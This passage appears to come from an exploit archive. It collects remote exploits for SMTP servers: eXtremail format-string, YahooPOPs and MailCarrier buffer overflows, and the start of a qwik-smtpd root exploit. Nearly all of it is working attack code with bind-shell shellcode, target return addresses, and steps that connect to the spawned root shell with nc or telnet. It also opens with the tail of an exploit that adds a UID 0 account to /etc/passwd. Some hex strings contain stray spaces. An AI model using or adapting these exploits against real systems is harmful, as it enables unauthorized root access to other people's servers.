printf ("\nIf successful a UID 0 Account 'keriohacker'");
printf ("\nhas been appended to /etc/passwd. Use 'ssh'");
printf ("\nor 'su' (if local) to get r00t! ....\n\n");
}
// [2003-06-27]
25 Linux eXtremail 1.5.x Remote Format Strings Exploit
/************************************************** **************/
/* Linux eXtremail 1.5.x Remote Format Strings Exploit */
/* */
/* */
/* By B-r00t - 02/07/2003 */
/* */
/* Versions: Linux eXtremail-1.5-8 => VULNERABLE */
/* Linux eXtremail-1.5-5 => VULNERABLE */
/* Exploit uses format strings bug in fLog() of smtpd to bind a */
/* r00tshell to port 36864 on the target eXtremail server. */
/* */
/************************************************** **************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define EXPLOIT "eXtreme"
#define DEST_PORT 25
// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);
// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
struct {
char *systemtype;
unsigned long got;
unsigned long ret;
int pad;
int buf;
int pos;
} targets[] = {
// Confirmed targets tested by B-r00t.
{ "RedHat 7.2 eXtremail V1.5 release 5
(eXtremail-1.5-5.i686.rpm)", 0x0813b19c, 0xbefff1e8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 5
(eXtremail-1.5-5.tar.gz)", 0x0813b19c, 0xbefff1b8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)", 0xbefff0c8,
0xbefff1d4, 1, 266, 44},
{ "eXtremail V1.5 DEBUG", 0x44434241, 0xaaaaaaaa, 1, 266,
44},
{ 0 }
};
int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";
printf ("\n%s by B-r00t <[email protected]>. (c) 2003\n",
EXPLOIT);
if (argc < 3)
usage ();
choice = atoi(argv[2]);
if (choice < 0 || choice > 3)
usage ();
setenv (TARGET, argv[1], 1);
get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}
void usage (void)
{
int loop;
printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
for (loop = 0; targets[loop].systemtype; loop++)
printf ("\n%d\t%s", loop, targets[loop].systemtype);
printf ("\n\nOn success a r00tshell will be spawned on port
36864.\n\n");
exit (-1);
}
int get_sock (char *host)
{
struct sockaddr_in dest_addr;
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("Socket Error!\n");
exit (-1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
perror("inet_aton problems\n");
exit (-2);
}
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
perror("Connect failed!\n");
close (socketfd);
exit (-3);
}
printf ("\n\nConnected to %s\n", host);
}
int send_sock (char *stuff)
{
int bytes;
bytes = (send (socketfd, stuff, strlen(stuff), 0));
if (bytes == -1) {
perror("Send error");
close (socketfd);
exit(4);
}
printf ("Send:\t%s", stuff);
return bytes;
}
int read_sock (void)
{
int bytes;
char buffer[200];
char *ptr;
ptr = buffer;
memset (buffer, '\0', sizeof(buffer));
bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
if (bytes == -1) {
perror("send error");
close (socketfd);
exit(4);
}
printf ("Recv:\t%s", buffer);
return bytes;
}
int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];
RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);
GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);
// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;
// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;
//1st GOT addy
strncat (buf, g, 4);
//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;
for (loop=0; loop<4; loop++) {
if (r[loop] > sofar) {
w[loop] = r[loop]-sofar;
} else
if (r[loop] == sofar) {
w[loop] = 0;
}else
if (r[loop] < sofar) {
w[loop] = (256-sofar)+r[loop];
}
sofar = sofar+w[loop];
}
bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));
// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);
// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864
....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}
// [2003-07-02]
25 YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit
/*
YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1
Exploit code by class101 [at] DFind.kd-team.com
Bind a shellcode to the port 101.
Thanx to Behrang Fouladi([email protected]) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work
Instead of to move like you Behrang EBX to ESP after overwritting EIP,
I found out that only jumping to EBX is needed because our crafted payload
starts at EBX.
The exploit is tested working on Win2K SP4 and WinXP SP1, and it should works
also on NT4 and 2003 as the shellcode is designed for.
The jmp esp is from libcurl.dll wich come with yahoopops, just to notice there is no need of an offset update,
this is already "universal".
This exploit can't overflow the port 110 (POP3), not enough space in the buffer to add a bind/reverse shell
maybe enough to spawn only one as the well know KaHT.
If you want to try on POP3, you should request more than 180 bytes to overwrite EAX and ECX
Maybe in a v0.2, I will add it , anyway check http://DFind.kd-team.com regulary.
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
char scode[] = //BIND shellcode port 101, thanx HDMoore.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[1024];
char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3"; //JMP EBX
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
char recvbuf[100];
int ip=htonl(inet_addr(argv[1])), port, size, x;
if (argc==3){port=atoi(argv[2]);}
else port=25;
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, checking the server..."<<endl;
Sleep(1000);recv(s,recvbuf,200,0);
if (strstr(recvbuf,"OK POP3 YahooPOPs")){cout<<"[+] this is not the POP3 port but the SMTP port that you should use."<<endl;return -1;}
if (!strstr(recvbuf,"220 YahooPOPs")){cout<<"[+] this is not a YahooPOPS server, quitting..."<<endl;return -1;}
cout<<"[+] YahooPOPS SMTP detected, constructing the payload"<<endl;
size=508-sizeof(scode);
memset(payload,0,sizeof(payload));
for (x=0;x<size;x++){strcat(payload,"\x90");}
strcat(payload,scode);strcat(payload,jmp);strcat(p ayload,jmpebx);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_ypops.exe ip port\n"<<endl;
cout<<"NOTE: The port should be the SMTP, not POP3!"<<endl;
cout<<" The port 25 is default if no port specified."<<endl;
cout<<" The exploit bind a shellcode to the port 101."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ================================================== =[v0.1]==="<<endl;
cout<<" ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit==="<<endl;
cout<<" =====coded by class101===========[DFind.kd-team.com 2004]==="<<endl;
cout<<" ================================================== =========="<<endl;
cout<<" "<<endl;
}
// [2004-10-15]
25 YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit
//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP
//[email protected]
//www.hackerscenter.com
//For more work check out, http://icis.digitalparadox.org
//This was done at 4 am so escuse the messy code if any
//Good job class101 on the windows version ;)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[1024];
char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3"; //JMP EBX
void usage(char* us);
void ver();
int main(int argc, char *argv[])
{
ver();
char grab[999];
int sock;
if (argc<4){
usage(argv[0]);return -1;
}
int ip=htonl(inet_addr(argv[1])), port, size, x;
if (argc==3){port=atoi(argv[2]);}
else port=25;
struct hostent *aap;
struct sockaddr_in addr;
if((aap=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("Gethostbyname()");
exit(1); }
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("Socket()");
exit(1); }
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
memcpy((char *)&addr.sin_addr,(char *)aap->h_addr,aap->h_length);
if(connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0) {
perror("Connect()");
exit(0); }
printf ("[+] Connected\n");
fflush(stdin);
sleep(2);
read(sock,grab,200);
printf ("[+] Reading Banner\n");
if (!strstr(grab,"220 YahooPOPs")) {
printf("[+] this is not a YahooPOPS server, quitting...\n");
return -1; }
printf ("[+] Found YahooPOP's Server\n");
size=508-sizeof(scode);
memset(payload,0,sizeof(payload));
for (x=0;x<size;x++){strcat(payload,"\x90");}
strcat(payload,scode);strcat(payload,jmp);strcat(p ayload,jmpebx);
printf ("[+] Sending Shellcode\n");
if (send(sock, payload, strlen(payload), 0) < 0) {
perror("Send()");
exit(0); }
printf ("[+] Sleep for 3 seconds\n");
sleep(3);
char hack[100];
sprintf (hack, "telnet %s 101", argv[1]);
system (hack);
return 0;
}
void usage(char* us)
{
printf("Usage: ./dc_ypop ip port\n");
printf("The exploit binds a shell to the port 101.\n");
return;
}
void ver()
{
printf ("################################################## ##############\n");
printf ("# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #\n");
printf ("# [email protected] www.hackerscenter.com #\n");
printf ("# Credits to Behrang Fouladi for finding this bug #\n");
printf ("################################################## ##############\n");
}
// [2004-10-18]
25 MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit
################################################## #######
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
################################################## #######
# D:\BO>mailcarrier-2.5-EHLO.py #
################################################## #######
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
################################################## #######
import struct
import socket
print "\n\n############################################## #"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "\n\n############################################## #"
def make_overflow_dummy(overflow_len, retaddr):
return 'A' * overflow_len + struct.pack('<L', retaddr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
# Change RET address as need be.
#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2 # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2 #RET WinXP SP2 ENG
try:
print "\nSending evil buffer..."
s.connect(('127.0.0.1',25))
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 101 on victim machine."
except:
print "Could not connect to SMTP!"
# [2004-10-26]
25 Qwik SMTP 0.3 Remote Root Format String Exploit
/*
** qwik-smtp Remote Root Exploit
** -------------------------------
**
** Bug found by: Dark Eagle <darkeagle [at] list d0t ru>
** Exploit coded by: Carlos Barros <barros [at] barrossecurity d0t com>
** Home Page: http://www.barrossecurity.com
**
** Exploitation techinique:
**
** This bug is a simple format string bug. While coding this exploit, I found just two
** "problems". The first is that our buffer is only 32 bytes long and the second is that
** qwik-smtpd filters spaces chars with the isspace(), this way our 0x0b code used in the
** shellcode is filtered. To circumvent the first problem I divided the exploit in two
** stages. The first one overwrite the LSW of the exit() GOT entry and the second overwrite
** the MSW. Then, we send an EXIT command forcing the qwik-smtpd to jump into our shellcode.
** The second problem was "fixed" using another char (0x10) and then decrementing it before
** calling the int 0x80 syscall.
**
** Notes:
**
** You MUST enter your external IP Address (when attacking remotely) or 127.0.0.1 (when
** attacking locally) cause its IP is printed before our buffer, so its length MUST enter
** in the calculation of the format string attack.
**
** sprintf(Received,"Received: from %s (HELO %s) (%s) by %s with SMTP; %s\n",
** clientHost, clientHelo, clientIP, localHost, timebuf);
** ----------
** Destination MUST be one valid email address on the target machine. If not, it will reply
** with one erro code like this:
**
** -> Sending RCPT TO ... ERROR - 550 user not here
**
** Screenshot:
**
** [barros@BarrosSecurity qwik]$ ./a.out -h localhost -u [email protected] -t 0 -i 127.0.0.1
**
** ==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==
**
** *** Target plataform : qwik_smtpd 0.3 - Fedor Core 2
** *** Target host : localhost
** *** Target port : 25
** *** Target GOT : 0x0804b2e8
**
** *** Target Retaddr : 0xfeffe6f0
**
** -> Connecting ... OK
** -> Getting the banner ... 220 SMTP service ready
**
** *** STAGE 1 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
**
** *** STAGE 2 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
** -> Attacking ... OK
**
** Try to send some commands. If doesn't work, hit CTRL+C to exit
**
** Linux BarrosSecurity 2.6.8-1.521 #1 Mon Aug 16 09:01:18 EDT 2004 i686 i686 i386 GNU/Linux
** uid=0(root) gid=0(root)
** exit
** [barros@BarrosSecurity qwik]$
*/
#include <getopt.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
/*--< Prototypes >--*/
void Usage(char *);
void fatal(char *);
int ConectToHost(char *,int);
char *CreateEvilBuffer(int,int);
void doHack(int);
void VerifyLastCommand(int, char *, char *);
void SendBufferAndVerify(int , char *, char *, char *);
/*--< Defines >--*/
#define DEFAULT_PORT 25
#define STDIN 0
#define STDOUT 1
#define MAX_BUFFER 1024
#define NOPSIZE 200
#define NOP 0x90
#define BUFFER_OFFSET "567" // Keep these \"
#define PADDING "." //
struct
{
char *Name;
int Gotaddr;
int Retaddr;
}Targets[] =
{
"qwik_smtpd 0.3 - Fedor Core 2",
0x0804b2e8,
0xfeffe6f0,
// Finish
0,
0,
0
};
// Shellcode by The Itch of Netric (www.netric.org)
char Shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0); */
"\x31\xc0\x50\x68\x6e\x2f\x73\x68" /* execve() of /bins/h */
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\xb0"
"\x10\x48\x48\x48\x48\x48" // Modified by Carlos Barros to skip isspace()
"\xcd\x80";
unsigned char STAGE=1;
int IP_Len = 0;
int main(int argc, char **argv)
{
extern char *optarg;
extern int optind;
char opt;
char *Host = NULL;
int Port = DEFAULT_PORT;
int TargetNumber = 0;
int Sock,i;
char *EvilBuffer;
char Buffer[MAX_BUFFER];
char *Rcpt_TO;
char Mail_From[NOPSIZE+strlen(Shellcode)+20];
int ttt;
fprintf(stdout,"\n==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==\n\n");
// Process arguments
while ( (opt = getopt(argc,argv,"i:h:t:p:u:")) != EOF)
{
switch(opt)
{
case 'i':
IP_Len = strlen(optarg);
break;
case 'u':
Rcpt_TO = optarg;
break;
case 'p':
Port = atoi(optarg);
if(!Port) Usage(argv[0]);
break;
case 't':
TargetNumber = atoi(optarg);
break;
case 'h':
Host = optarg;
break;
default: Usage(argv[0]);
break;
}
}
if(Host == NULL || Rcpt_TO == NULL || !IP_Len) Usage(argv[0]);
// Verify target
for(i=0;;i++)
if(Targets[i].Name == 0) break;
if(--i<TargetNumber) Usage(argv[0]);
fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name);
fprintf(stdout,"*** Target host : %s\n",Host);
fprintf(stdout,"*** Target port : %u\n",Port);
fprintf(stdout,"*** Target GOT : %#010x\n\n",Targets[TargetNumber].Gotaddr);
fprintf(stdout,"*** Target Retaddr : %#010x\n\n",Targets[TargetNumber].Retaddr);
